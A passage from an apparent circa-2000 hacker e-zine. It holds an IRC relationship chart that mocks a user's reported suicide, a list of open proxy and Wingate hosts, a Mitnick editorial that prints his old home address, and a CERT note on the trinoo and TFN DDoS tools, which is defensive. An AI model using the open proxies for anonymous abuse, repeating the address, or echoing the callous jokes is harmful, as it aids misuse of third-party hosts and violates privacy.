- - - - - - - - - - - - - - - - - - - - - - - - - - unconfirmed links: these are links i've been told more than twice to add, but have then been told by others to remove once they're on the chart. each link stays for six months, & if no one can prove it's valid in that time, it is removed & assumed untrue. if you bore witness to one of these links or know someone who did, mail crank@ice.net with your confession! (no unconfirmed links at this time.) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - notable gross things on the chart: this is a section for easy reference to family members on the chart. the end people are the relation as noted. if you know two people on the big loop are in the same family, mail crank@ice.net & let us rejoice in the incest! tigerbeck -- aries99 1 link: siblings spirit -- hillary -- seth -- candyrain 3 links: siblings pixy -- gweeds -- jess -- andrew -- mswicked 4 links: siblings blueeyes -- 8ball -- crank -- aoxomoxoa -- poppie -- donnie 5 links: siblings art -- seaya -- kaia -- murmur -- sonia -- plexus 5 links: siblings potter -- scat -- bF -- evol -- styx 4 links: cousins christy -- kkrazy -- kinessa -- gweeds -- LCN -- tanadept 5 links: stepsiblings - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #2600: lashtal | empress deadguy | maverick | | | | sin ----- speck -- liquid_motion | | beastly -- c4in d_rebel kspiff -- mimes -- dieznyik -- nelli | borys -- zebby (#bodyart) LdyMuriel Erato flutterbi chexbitz `---. | .---' | Kalika -- IceHeart -------------- virago -- mre || | | | Berdiene --'| | Pyra -- Roamer ewheat | `---------. Serenla --' roach -- satsuki -- spinningmind kitiara -- starlord anarchy -- aphex twin soul seeker -- educated guess tempus thales -- lady in black -- midnight sorrow magnatop -- darice jandor -- alexis ryna illusionx -- thumper javaman -- nrmlgrl - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - bodyart [#bodyart/#bodypiercing/#tattoo]: ga[r]y | | xindjoo -- grrtigger -- bone-head | | FreAkBoi -- psychoslut -- timo heidikins -- pasquale grub -- gypsie tabaqui -- catbones -- sprite ministry -- SuperMia -- superdave bert37 -- chiot steppah -- creeper syx66 -- gypsy_whore - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #coders: simon -- wolfie -- raphael (#trax) bolt -- ashli - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #ezines: sirlance -- holly -- hardcore | rattle -- s4ra -- doommaker phairgirl -- M4D_3LF -- amanda -- unrelated -- effy -- BigDaddyBill | | pixieOpower spiff -- tl109 figglemuffinz -- creed ilsundal -- fairy_princess vanir -- darkland snarfblat -- d1d1 dimes -- bexy -- mindcrime tut -- casey pezmonkey -- cptbovine greyhawk -- crazybaby cheesus -- meowkovich catbutt -- pulse ygraine -- drool bigmike -- shana camel -- icee UberFizzGig -- kniht -- wadsworth - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #hack: t0c -- seussy -- o0 | taner glyph -- adnama -- weaselboy -- vein -- montell | | m0rticia shamrock -- jennicide -- efpee -- imposter-dh | bellum radikahl -- jazmine -- gitm t3kg -- elfgard pluvius -- lydia panic -- plant -- erikt sl33p -- molldoll allman -- costales rhost -- sue_white serpent -- no_ana vaxbuster -- tiggie -- redragon ajrez -- luminare -- m0jo - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #mindvox: killarney -- tomwhore -- fairosa -- kids - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - misc: MsLePew -- Beacher sangfroid -- inspektor foo -- leeny HippieEB -- Imaj mskathy -- strahd plutonium -- pixiedust cnelson -- vanessa Hawkerly --- MeaNKaT --- Morpheus Vega1 -- Serena DIPTY_DO -- Trish_ -- hellsnake Grace^ -- Gusto -- puckie notyou -- jennyh Skada -- icee_bin -- eriss doogie -- sarahlove kirby-wan -- cybergirl lurid -- deb -- bmbr j-dog -- a_kitten Fenchurch -- Becca captain_zap -- ms_infowar jaran -- duke chs -- princess ndex -- illusions - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - music [#punk/#ska/#sxe]: solaris -- kojak -- chelsea -- pieskin -- lady rude | kcskin -- janew | kamaskin -- kimee -- dano joojoo nes | | auralee -- konfuz -- subgurl -- danx -- starla | | kathy21 alee mutata -- skidman shellskin -- amberskin astrophil -- maggiemae skarjerk -- pancreas prick -- taxie -- jubjub - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #seattle: nitefall bgh -- superlime -- Shill -- Lizsac fimble | | | juice -- e1mo -- shane -- aeriona -- Justnsane -- koosh -- tcb clarita -- dataangel wyclef -- NessaLee Drmc -- Jill- SisSoul -- Matt Dawgie -- Jenay jsk -- ames Liz -- jkowall kurgan -- babygrrl Mcbeth -- BeccaBoo djinn -- ruthe wankle -- carrianne hamilton -- nurit - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #skate: kindje -- tigerkat -- huphtur -- superzan | punkgirl -- yakuza -- maryjane | caroline -- rhy cosmo cks lodias `--. | .--' outlander -- spike -- lightborn .--'|||`--. darkelf ||| weevil ||| tenchi --'|`-- h0ly [r] katskate -- earwax vlinder -- miesj superfly -- conchita -- nobaboon -- no_fievel p4nacea -- bakunin herculez -- nicki - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #trax: cardiac sandman -- trissy skie -- necros | | | saxy -- vegas basehead | | | kiwidog fassassin -- discodiva gblues | squeep -- qporucpine -- ami -- dilvish higherbeing -- ms_saigon -- floss | | howler vizz mellow-d -- kisu -- snowman -- trixi | megz lowrider -- lum -- perisoft mickrip -- astrid -- draggy -- leece pandorra -- malakai ozone -- bliss animix -- pixie lummy -- daedalus frostbitten_dream -- pickl'ette -- redial - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #twilight_zone: revneptho dtm Frizz0 Wireless `----.| .---' | h0lydirt --- nina -- zbrightmn -- halah .--'| `---. | dog3 | whistler RockShox | chilly joeN -- daysee -- evil_ed -- linnea | munchie Loverman -- Missi redbird -- reddy - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #unix: in4mer -- devilgrl gerg -- tyger chloe -- cosmos dem -- webb callechan -- rhiannon RealScott -- Ila supertaz -- skye - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - revision history -- last updated 7-28-99 v9.04: added belial, f_fisher, Murmur_gth, bix, DJTrax, kamira, Heather, phen, montel, monachus, Schquimpy, Nex, phreaky, Sylvie, Katia, banshee, PointBlank, & RaggedyAnne. added magpie, hydro311, kamira, disorder, apok0lyps, maq, rage, & thepublic to the secondary chart. (if anyone has an alternate nick for the #gothic Murmur, please mail me. i used the nick Murmur_gth for now.) added misc gh0st group to the big loop. gweeds moves up to winner 1. meenk moves up to winner 2. gothbitch moves up to honorable mention 12. renamed Listener to alecks. renamed illuminaeti to luminare. renamed zines category to #ezines. added phairgirl -- pixieOpower -- M4D_3LF -- amanda to #ezines. added amanda -- unrelated -- effy -- BigDaddyBill to #ezines. added jennicide -- bellum to #hack. added luminare -- ajrez to #hack. added to misc: deb -- bmbr j-dog -- a_kitten Fenchurch -- Becca captain_zap -- ms_infowar deb -- lurid jaran -- duke chs -- princess ndex -- illusions removed one outdated "unconfirmed link". removed miasma -- six from unconfirmed. oops. removed bogus links: t -- gf -- lilfeet Quarex -- keroppi new links: fizzgig -- (solomon, Asmodeus, fishie, belial) Grue -- gothbitch -- Asmodeus gothbitch -- belial -- Uadjit METchiCK -- (f_fisher, grimmy, deadapril, supervixn) kel -- (disorder, lizzie, gh0st) corp -- gweeds -- magpie aex -- Murmur_gth eppie -- bix styx -- DJTrax meenk -- hydro311 halfman -- sumogirl disorder -- kamira -- apok0lyps -- maq -- Heather -- montel el_jefe -- (Mika, phen, Heather) daud -- monachus amos -- velcro Schquimpy -- (trilobyte, EddieV, Nex) splat -- phreaky Sylvie -- neko -- Katia shipley -- banshee thepublic -- rage hylonome -- PointBlank -- RaggedyAnne hylonome -- RaggedyAnne -- Quarex v9.03: added deadgirl, Gemni, DrMonk, AK47, monkeygrl, Miah, grlfrmars, wildcard, spectacle, kev-man, bile, chinagirl, rubella, Arkham, Uadjit, fishie, solomon, moomin13, Grue, Missa, Mottyl, Kalannar, E_D, Fiore, MartYr, & Stipen. added angieb to the secondary chart. updated number of people in the big loop. gweeds moves up to winner 2. meenk moves up to winner 3. gothbitch moves up to honorable mention 9. added miasma -- six to unconfirmed. added zines The_Sock group to the big loop. added zines AnonGirl group to the big loop. added javaman -- nrmlgrl to #2600. added satsuki -- (IceHeart, roach, spinningmind) to #2600. added doogie -- sarahlove to misc. added kirby-wan -- cybergirl to misc. added shane -- aeriona to #seattle. added to #trax: skie -- necros astrid -- draggy ms_saigon -- vizz snowman -- megz removed bogus links: mailart -- konfuz (mailart = nes) new links: DH -- Gemni -- DrMonk meenk -- AK47 gweeds -- angieb AIDS -- caitlin deadgirl -- Mali -- maq logicbox -- monkeygrl Fiore -- gothbitch -- Miah grlfrmars -- (mogel, wildcard, spectacle, kev-man) turtlegrl -- bile trilobyte -- chinagirl fizzgig -- rubella anubis -- Arkham swisspope -- AnonGirl pahroza -- Uadjit -- solomon -- moomin13 -- Grue Fiore -- solomon -- gothbitch -- Uadjit -- fishie -- Missa Mottyl -- (solomon, Kalannar, E_D) MartYr -- Fiore -- Stipen v9.02: added rebrane, Xaotika, valeriee, JelloMold, neologic, amos, EddieV, Roadruner, TAYL0R HAWKINS, MINNIE DRIVER, secretboy, kel, nevre, freqout, krnl, skatin, Sinja, Frobozz, & hawk. gweeds moves up to winner 2. meenk moves up to winner 3. sQurl moves up to winner 6. metalchic moves up to honorable mention 9. renamed cannianne to carrianne. added to misc: Hawkerly --- MeaNKaT --- Morpheus Vega1 -- Serena DIPTY_DO -- Trish_ -- hellsnake Grace^ -- Gusto -- puckie notyou -- jennyh Skada -- icee_bin -- eriss (special note: eriss was dumped for Skada & subsequently leapt to her death from a nineteeth story window. neat!) added to #zines: nico -- anjee -- meethos -- METchiCK -- The_Sock -- ^mindy^ meethos -- Alucard -- The_Sock -- kitn -- ILUVJeNNA MrJuGGaLo -- METchiCK -- facedown caitlin --- wmmr --- coffeegrl AnonGirl -- Medusa -- PrimeX -- Juliette removed bogus links: emmie -- (netik, msk, Herodotus) billn -- Tay -- retrospek mayfair -- outside Mali -- (Asmodeus, pahroza, Uhlume, Imperia) new links: emmie -- rebrane -- JelloMold Xaotika -- lethar -- valeriee mayfair -- neologic trilobyte -- amos -- EddieV -- sonia sQurl -- Roadruner Tay -- TAYL0R HAWKINS -- MINNIE DRIVER anubis -- secretboy netmask -- kel meenk -- nevre gweeds -- freqout missx -- krnl metalchic -- skatin Imperia -- Asmodeus -- Sinja turtlgrl -- pahroza -- gothbitch -- Mali -- lethar fizzgig -- msk gothbitch -- Frobozz darwin -- hawk v9.01: added tamago, atticus, lilindian, martyn, aries99, ryshask, timmerca, twichykat, soulvamp, mysl, fizzgig, lethar, anubis, & inox. added tigerbeck & bifrost to the secondary chart. updated number of people in the big loop. new "gross link": tigerbeck -- aries99 (1: siblings) gweeds moves up to winner 3. tigerbeck moves up to honorable mention 10. added FreAkBoi -- psychoslut -- timo to #bodyart. added supertaz -- skye to #unix. removed one outdated "unconfirmed link". removed bogus links: juliet -- readwerd FreAkBoi -- ga[r]y (#bodyart) Briana -- homeysan new links: seaya -- tamago _Melody_ -- atticus DrkSphere -- lilindian tigerbeck -- (aries99, martyn, ryshask, timmerca, soulvamp) tigerbeck -- (allira, twichykat, spacegirl, bifrost) gweeds -- mysl msk -- DangerJen -- Astaroth outside -- mayfair netik -- fizzgig emmie -- lethar pahroza -- anubis aex -- inox v9.00: i was going to do something special for 9.00, but there just isn't anything to do. would you people be interested in sexchart tshirts? mail crank@ice.net. note to webmasters - it's not sexchart.8 anymore - sexchart.txt. be sure to update your links. added NeuralizR, vlaad, pahroza, Imperia, Mali, Uhlume, StVitus, Herodotus, & Asmodeus. added am0eba, & spyder_bytes to the secondary chart. added netik & Mali sections to the big loop. added new section: #seattle. moved e1mo links to #seattle. moved koosh -- tcb to #seattle. moved clarita -- dataangel to #seattle. added chexbitz -- virago -- ewheat to #2600. added Astaroth -- DangerJen to #gothic. added plutonium -- pixiedust to misc. added cnelson -- vanessa to misc. added to #seattle: wyclef -- NessaLee Drmc -- Jill- SisSoul -- Matt Dawgie -- Jenay jsk -- ames Liz -- jkowall bgh -- superlime -- Shill -- Lizsac fimble -- koosh -- Justnsane -- aeriona -- superlime kurgan -- babygrrl Mcbeth -- BeccaBoo djinn -- ruthe wankle -- cannianne hamilton -- nurit added halah -- Wireless to #twilight_zone. removed one outdated "unconfirmed link". removed bogus links: e1mo -- chris22 (#seattle) loki -- am0eba -- sledge missx -- (sledge, erikb, ice9) Briana -- nebulizr logicbox -- skully murcurochrome -- jazmine -- deadkat (#hack) new links: am0eba -- spyder_bytes Briana -- (NeuralizR, bumble, nettwerk, homeysan, tsal) teletype -- vlaad netik -- msk -- emmie -- outside aex -- bifrost -- emmie -- netik emmie -- Herodotus bifrost -- turtlgrl Imperia -- msk Mali -- (Uhlume, Imperia, Asmodeus, StVitus, pahroza) @HWA 05.0 Peer finally arrested after over a decade of connection resetting ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.ircnews.com/ (Humour, in case you didn't know a common connection error is "connection reset by peer" caused by errors in the network and on occasion a DoS attack on your IRC connection... ;) - Ed) Peer Arrested, Charged With Resetting Connections SEATTLE, WA - An exhaustive eight month cyberhunt ended shortly before dawn on January 14th, 2000, as FBI agents and Washington State Troopers apprehended the elusive chatroom terrorist known only as Peer. The IRC menace was brought to justice after a decade-long connection resetting spree that plagued chatters around the globe. FBI officials said the number of reset connections numbered in the "millions". Connections being reset by peer were the number one cause of interupted chat sessions on all major IRC networks in 1999. Undernet ChanServ Committee member Morrissey told IRCNews.com, "What set peer apart was the element of suprise. With ping, you kinda knew you were gonna time out. You could tell. Peer totally got you out of nowhere." Leland, another bigshot on the Undernet IRC network, praised the FBI for their work, "How many idle times must be ruined? How many cybersex sessions must be cut short before we put an end to Peer and his shinanigans?" Peer's lawyers criticized Leland's use of the word "shinanigans". Peer's lead defence attorney responded, "Really, I think we can come up with a better term than that. We're all adults here. Besides, it's 'alleged' shinanigans." Federal Prosecutor Sarah Evans told IRCNews.com she intends to "throw the book" at Peer. If convicted on all counts, Peer could spend up to the next three years on probation. "His ass is mine.", claimed a motivated Evans. "With any luck, we'll get that judge who handled the Mitnick case." @HWA 06.0 Updated proxies list from IRC4all ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.lightspeed.de/irc4all/ Socks 4 proxies: ~~~~~~~~~~~~~~~~ NotFound 200.248.68.129 NotFound 200.36.19.225 NotFound 195.5.52.154 ch-angrignon.qc.ca 207.236.200.66 m105.clic-in.com.br 200.231.28.15 NotFound 195.42.150.129 www.quicktest.com 12.8.210.132 internet-server.ebf.com.br 200.231.27.1 wk135.dnr-inc.com 216.62.50.135 122-94.w3.com.uy 207.3.122.94 mail.theova.com 195.14.148.65 mercury.knowlbo.co.jp 210.160.144.146 igic.bas-net.by 194.85.255.49 cr216724724.cable.net.co 216.72.47.24 zakproxy.alexcomm.net 163.121.219.62 proxy.quicktest.com 12.8.210.130 NotFound 195.14.148.101 NotFound 210.237.181.226 zskom.vol.cz 212.27.207.7 tsp-proxy.tsss.com 12.2.81.50 proxy.utvlive.com 194.46.2.34 news.ukrnafta.ukrtel.net 195.5.22.196 pcse.essalud.sld.pe 200.37.132.130 dns-server1.tj.pa.gov.br 200.242.244.1 cr216724718.cable.net.co 216.72.47.18 NotFound 194.85.255.117 NotFound 195.42.150.132 NotFound 212.22.69.35 patter.lnk.telstra.net 139.130.81.160 nic-c49-067.mw.mediaone.net 24.131.49.67 NotFound 206.112.35.146 ts18.svamberk.cz 212.47.11.231 NotFound 212.68.162.183 NotFound 194.204.206.139 mars.sos.com.pl 195.117.212.4 mail.ermanco.com 12.2.82.130 www.ukrnafta.ukrtel.net 195.5.22.195 39.volgaex.ru 194.84.127.39 NotFound 194.243.99.199 www.cassvillesd.k12.wi.us 216.56.42.3 34.volgaex.ru 194.84.127.34 pc-gusev3.ccas.ru 193.232.81.47 xl2.cscd.lviv.ua 195.5.56.1 modemcable161.21-200-24.timi.mc.videotron.net 24.200.21.161 tconl9076.tconl.com 204.26.90.76 jm1.joroistenmetalli.fi 194.137.219.130 jovellanos.com 194.224.183.221 ns.ticketport.co.jp 210.160.142.82 plebiscito.synapsis.it 195.31.227.14 NotFound 194.243.99.162 NotFound 194.204.205.93 NotFound 212.205.26.80 NotFound 210.56.18.228 h0000e894998c.ne.mediaone.net 24.128.161.28 NotFound 198.162.23.185 www.sos.iqnet.cz 212.71.157.102 ns.terna.ru 212.188.26.67 NotFound 206.103.12.131 NotFound 203.116.5.58 207-246-74-54.xdsl.qx.net 207.246.74.54 adsl-63-196-81-8.dsl.sndg02.pacbell.net 63.196.81.8 glennsil.ne.mediaone.net 24.128.160.74 dns.hokuto.ed.jp 210.233.0.34 210-55-191-126.ipnets.xtra.co.nz 210.55.191.126 relectronic.ozemail.com.au 203.108.38.61 sai0103.erols.com 207.96.118.243 frontier.netline.net.au 203.28.52.160 210-55-191-125.ipnets.xtra.co.nz 210.55.191.125 NotFound 212.68.162.177 216-59-41-69.usa.flashcom.net 216.59.41.69 mail.medikona.lt 195.14.162.220 NotFound 195.14.148.99 proxy1.israeloff.com 206.112.35.156 NotFound 195.14.148.98 NotFound 195.14.148.97 mail.trutnov.cz 212.27.207.8 sripenanti01-kmr.tm.net.my 202.188.62.6 c111.h202052116.is.net.tw 202.52.116.111 NotFound 195.14.148.100 nevisco.city.tvnet.hu 195.38.100.242 ipshome-gw.iwahashi.co.jp 210.164.242.146 216-59-40-227.usa.flashcom.net 216.59.40.227 NotFound 212.47.11.130 216-59-40-72.usa.flashcom.net 216.59.40.72 altona.lnk.telstra.net 139.130.80.123 burnem.lnk.telstra.net 139.130.54.178 edtn004203.hs.telusplanet.net 161.184.152.139 ns.ukrnafta.ukrtel.net 195.5.22.193 edtn002050.hs.telusplanet.net 161.184.144.18 nic-c40-143.mw.mediaone.net 24.131.40.143 gk8-206.47.23.149.kingston.net 206.47.23.149 dns.rikcad.co.jp 210.170.89.210 dsl-148-146.tstonramp.com 206.55.148.146 52-012.al.cgocable.ca 205.237.52.12 216-59-38-142.usa.flashcom.net 216.59.38.142 dns1.ctsjp.co.jp 210.172.87.146 52-061.al.cgocable.ca 205.237.52.61 edtn003590.hs.telusplanet.net 161.184.150.34 modemcable215.2-200-24.hull.mc.videotron.net 24.200.2.215 Socks 5 proxies ~~~~~~~~~~~~~~~ NotFound 195.5.52.154 NotFound 168.187.78.34 NotFound 210.56.18.228 NotFound 200.241.64.130 NotFound 206.112.35.146 NotFound 194.243.99.162 NotFound 194.243.99.199 garrison-grafixx.com 216.36.30.76 internet-server.ebf.com.br 200.231.27.1 pc-gusev3.ccas.ru 193.232.81.47 mail.clintrak.com 206.112.35.178 NotFound 195.146.97.178 ns.wings.co.jp 210.168.241.106 wk135.dnr-inc.com 216.62.50.135 ts18.svamberk.cz 212.47.11.231 jm1.joroistenmetalli.fi 194.137.219.130 morris.ocs.k12.al.us 216.77.56.74 c111.h202052116.is.net.tw 202.52.116.111 relectronic.ozemail.com.au 203.108.38.61 jovellanos.com 194.224.183.221 oms.ocs.k12.al.us 216.77.56.106 ntserver01.thomastonschools.org 209.150.52.114 port58151.btl.net 206.153.58.151 mail.medikona.lt 195.14.162.220 chester.chesterschooldistrict.com 12.6.236.250 NotFound 206.103.12.131 p5.itb.it 194.243.165.21 NotFound 194.226.183.34 nic-c49-067.mw.mediaone.net 24.131.49.67 south.ocs.k12.al.us 216.77.56.90 NotFound 195.146.98.226 cr216724718.cable.net.co 216.72.47.18 north.ocs.k12.al.us 216.77.56.66 dns.hokuto.ed.jp 210.233.0.34 linux.edu.vologda.ru 194.84.125.217 proxy.utvlive.com 194.46.2.34 ibp.santa.krs.ru 195.161.57.133 dns.rikcad.co.jp 210.170.89.210 207-246-74-54.xdsl.qx.net 207.246.74.54 jeter.ocs.k12.al.us 216.77.56.98 carver.ocs.k12.al.us 216.77.56.114 ohs.ocs.k12.al.us 216.77.56.122 wforest.ocs.k12.al.us 216.77.56.82 dns1.ctsjp.co.jp 210.172.87.146 edtn003590.hs.telusplanet.net 161.184.150.34 edtn004203.hs.telusplanet.net 161.184.152.139 165-246.tr.cgocable.ca 24.226.165.246 216-59-41-69.usa.flashcom.net 216.59.41.69 Wingates ~~~~~~~~ NotFound 210.56.18.228 NotFound 206.103.12.131 port58151.btl.net 206.153.58.151 NotFound 200.241.64.130 wk135.dnr-inc.com 216.62.50.135 cr216724718.cable.net.co 216.72.47.18 dns.hokuto.ed.jp 210.233.0.34 dns.rikcad.co.jp 210.170.89.210 altona.lnk.telstra.net 139.130.80.123 burnem.lnk.telstra.net 139.130.54.178 52-061.al.cgocable.ca 205.237.52.61 proxy.utvlive.com 194.46.2.34 207-246-74-54.xdsl.qx.net 207.246.74.54 edtn002050.hs.telusplanet.net 161.184.144.18 dns1.ctsjp.co.jp 210.172.87.146 edtn004203.hs.telusplanet.net 161.184.152.139 mars.sos.com.pl 195.117.212.4 165-246.tr.cgocable.ca 24.226.165.246 Other proxies available, check the site for more/updated lists. @HWA 07.0 Rant: Mitnick to go wireless? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Editorial, by Cruciphux Jan 23rd 2000 Finally the long awaited release of ueber hacker Kevin Mitnick has arrived, he was released Friday Jan. 21st in the morning and is not allowed to touch computers or cellular phones for a period of three years without express permission of his probation officer. Kevin holds out one hope though, earlier in his 'carreer' Kevin was an avid amateur radio operator and his license recently expired, he is reportedly scrambling to obtain a new one. This poses some very interesting questions, will he be allowed to operate his HAM equipment? Packet Radio For those not in the know myself and several HWA members are also HAM operators, most of us got hooked by the prospect of a technology called "packet radio". The internet runs on a protocol known as X.25 packet radio uses a similar methodology known as AX.25, the "A" denotes "A"mateur. We're some of the few people that have actually IRC'ed using a packet radio link to a unix server over the 2m band, but of course this requires a computer and additional computer equipment hooked to the radio gear necessary to run packet, what if we forget all that since it is out of Kevin's reach to own a computer at this time and look at what other 'trouble' he can get into. Repeater Nets and the Autopatch The radios of choice these days among young hams are dual band HT's (short for handy-talky or 'walky-talkie') these will usually cover the 2m band and the 440 cm bands, the 2m band by itself is the most common band in use and operates a great deal using repeaters. A repeater can be compared to a cell site insomuch as it takes a weak signal (the HT, generally 100mw to 4 watts in power, much like small cell phones) and REPEATS or re-broadcasts on another (close) frequency a stronger signal, thus reaching greater range. With special DTMF codes it is possible to LINK repeaters and talk across the country using repeater nets. Whats so great about this?, apart from the obvious ability to talk to people long distances for little to no cost, many repeaters have the magic box known as an AUTOPATCH. The autopatch is a computer interface at the repeater site that interfaces your radio signals with a TELCO line. (aha!). Yes many hams enjoy the priviledges (minus obvious privacy and anonymity) of 'cellular' or 'radio phone' useage for minimal cost. For a GOOD radio you are looking at an investment around $500 and for a HAM club membership (to get all the repeater and autopatch codes etc) you're looking at around $15/year or you can find the codes posted in many places on the web. Caveats / privacy The airwaves are 'public property' and as such are regulated (for our own good of course) by big brother, that being the FCC in the U.S.A or DOC in Canada. When you pass your licensing test (minimal proficiency in electronics and general radio theory must be demonstrated via written test) you will be assigned a unique CALL SIGN (in some places you can request a custom/vanity sequence but will be allocated a random unused call if your request is being used). Since the airwaves are public property, so are the records of those users that are licensed to broadcast on them. Several online databases exist or can be purchased cheaply on CDROM with many search features like search by name, call address, partials etc... in this case a simple search on the QRZ website (http://www.qrz.com/) in the OLD database for "Kevin Mitnick" returns several possible matches, among them the correct one which is listed below. -------------------------------------------------------------------------- Callbook Data for N6NHG The following information is taken from the March 1993 QRZ Ham Radio Callsign Database. This is not the current information for this callsign. Click on the underlined callsign to see the latest information for this record. Callsign: N6NHG Class: General Name: KEVIN D MITNICK Effective: 12 Dec 1989 Expires: 12 Dec 1999 Address: 14744 LEADWELL ST City/State: VAN NUYS CA 91405 -------------------------------------------------------------------------- We can safely assume this is correct since the initials (KDM) are right and the location matches up along with the license renewal date of 12/12/99. Shennanigans How does Kevin fit into all this? well as you can see, it is possible to interface the radio with computer equipment and also manipulate outside phone lines using ham radios, a recurring problem in these parts were pirate operators making bogus 911 calls using the local CN-Tower's (then public or 'open' autopatch - it now requires a code and subaudible PL tone) actually closed down the repeater site for some time and caused unknown harassing traffic to the 911 operators fielding the bogus calls. The pirate is not totally safe however. much like Kevin was apprehended by Tsutomu thru lax use of his cellphone and some radio direction finding gear (RDF) so can the 2m pirate be tracked through RDF triangulation, several grass roots groups do nothing but track down pirate signals or sometimes for competition, random placed signals, in what is known as the 'Fox Hunt'. But this requires lots of manpower and the willingness to get out there and help do some tracking. Epilogue I truly hope Kevin is allowed to get back into one of his lifetime loves but he may find that there are too many caveats with new features and computer integration into the repeater systems, mailboxes and the like are common place on repeaters, and so are email gateways, so it is conceivable that one could inadvertantly get into trouble through the grey lines of technology.... Meanwhile, all the best to Kevin and his family, and hopefully you learned a little bit about amateur radio's offerings along the way, peace out. Cruciphux cruciphux@dok.org Editor HWA.hax0r.news newsletter. http://welcome.to/HWA.hax0r.news/ Further reading: http://www.arrl.org - The main site of the American Radio Relay League http://www.qrz.com/ - If you know the callsign of the operator his docs are published publically in a database which can be searched online here. Also contains other info and links. http://www.freekevin.com/ - You know, like more info than you need on KDM. @HWA 08.0 Distrubuted Attacks on the rise. TFN and Trinoo. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ CMP Techweb : http://www.techweb.com/wire/story/TWB19991130S0010 Intruders Get Under A Network's Skin (11/30/99, 5:40 p.m. ET) By Rutrell Yasin, InternetWeek A rise in rogue distributed denial of service tools being installed on networks by intruders has prompted the Computer Emergency Response Team (CERT) Coordination Center to help companies thwart the large coordinated packet flooding attacks. CERT, a watchguard organization, has issued an advisory on two tools--trinoo and Tribe Flood Network (TFN)--after receiving reports from organizations affected by the tools. The tools "appear to be undergoing active development, testing, and deployment on the Internet," according to a CERT incident note. So far, the tools have been installed on thousands of servers or workstations in about 100 enterprise sites, said Kevin Houle, CERT's incident response team leader. While the type of packet flooding attacks the tools generate are not new, the scope of the attacks can have a devastating impact on an enterprise network, industry experts and IT managers agreed. Both trinoo and TFN enable an intruder to launch coordinated attacks from many sources against one or more targets. In essence, the tools use bandwidth from multiple systems on diverse networks to generate potent attacks. The tools "can generate very large denial of service attacks that consume as much as one gigabyte of data per second," said Houle. To put that in perspective: Rather than using one BB gun to hit a target, a hacker now has the equivalent of 1,000 BB guns, Houle said. Or the effects can be more like a shotgun, said Mike Hagger, vice president of security at Oppenheimer Funds. These tools can "be deadly and can bring a company to its knees in a matter of seconds," Hagger said. These rogue distributed tools are usually installed on host servers that have been compromised by exploiting known security holes, such as various Remote Procedural Call vulnerabilities, according to CERT. Trinoo is used to launch coordinated UDP flood attacks from many sources. A trinoo network consists of a small number of servers and a large number of clients. To initiate an attack, an intruder connects to a trinoo server and instructs it to launch an attack against one or more IP addresses. The trinoo server then communicates with the clients, giving them instructions to attack one or more IP addresses for a specified period of time, CERT said. In addition to UDP flood attacks, TFN can generate TCP SYN flood, ICMPecho request flood, and ICMP directed broadcasts or smurf attacks. The tool can generate packets with spoofed source IP addresses. To launch an attack with TFN, an intruder instructs a client or server program to send attack instructions to a list of TFN servers or clients. In its alert, CERT has issued a number of steps IT managers can take to thwart distributed denial of service attacks. To prevent installation of distributed attack tools on networked systems, users should stay up to date with security patches to operating systems and applications software. IT managers should also continuously monitor their networks for signature of distributed attack tools. For example, if a company uses intrusion detection systems, IT should tune it to recognize signs of trinoo or TFN activity. Since a site under attack may be unable to communicate via the Internet during an attack, security policies should include "out of the band communications with upstream network operators or emergency response teams," CERT advised. @HWA CERT Advisory: http://www.cert.org/incident_notes/IN-99-07.html CERT® Incident Note IN-99-07 The CERT Coordination Center publishes incident notes to provide information about incidents to the Internet community. Distributed Denial of Service Tools Updated: December 8, 1999 (added DSIT Workshop paper and IN-99-05) Thursday, November 18, 1999 Overview We have received reports of intruders installing distributed denial of service tools. Tools we have encountered utilize distributed technology to create large networks of hosts capable of launching large coordinated packet flooding denial of service attacks. We have seen distributed tools installed on hosts that have been compromised due to exploitation of known vulnerabilities. In particular, we have seen vulnerabilities in various RPC services exploited. For more information see the following CERT Incident Notes: IN-99-04, Similar Attacks Using Various RPC Services IN-99-05, Systems Compromised Through a Vulnerability in am-utils Two of the tools we have seen are known as trinoo (or trin00) and tribe flood network (or TFN). These tools appear to be undergoing active development, testing, and deployment on the Internet. Descriptions Trinoo Tribe Flood Network Trinoo Trinoo is a distributed tool used to launch coordinated UDP flood denial of service attacks from many sources. For more information about various UDP flood attacks, please see CERT Advisory CA-96.01. A trinoo network consists of a small number of servers, or masters, and a large number of clients, or daemons. A denial of service attack utilizing a trinoo network is carried out by an intruder connecting to a trinoo master and instructing that master to launch a denial of service attack against one or more IP addresses. The trinoo master then communicates with the daemons giving instructions to attack one or more IP addresses for a specified period of time. 1.intruder -------> master; destination port 27665/tcp 2.master -------> daemons; destination port 27444/udp 3.daemons -------> UDP flood to target with randomized destination ports The binary for the trinoo daemon contains IP addresses for one or more trinoo master. When the trinoo daemon is executed, the daemon announces it's availability by sending a UDP packet containing the string "*HELLO*" to it's programmed trinoo master IP addresses. daemon -------> masters; destination port 31335/udp The trinoo master stores a list of known daemons in an encrypted file named "..." in the same directory as the master binary. The trinoo master can be instructed to send a broadcast request to all known daemons to confirm availability. Daemons receiving the broadcast respond to the master with a UDP packet containing the string "PONG". 1.intruder -------> master; destination port 27665/tcp 2.master -------> daemons; destination port 27444/udp 3.daemons -------> master; destination port 31335/udp All communications to the master on port 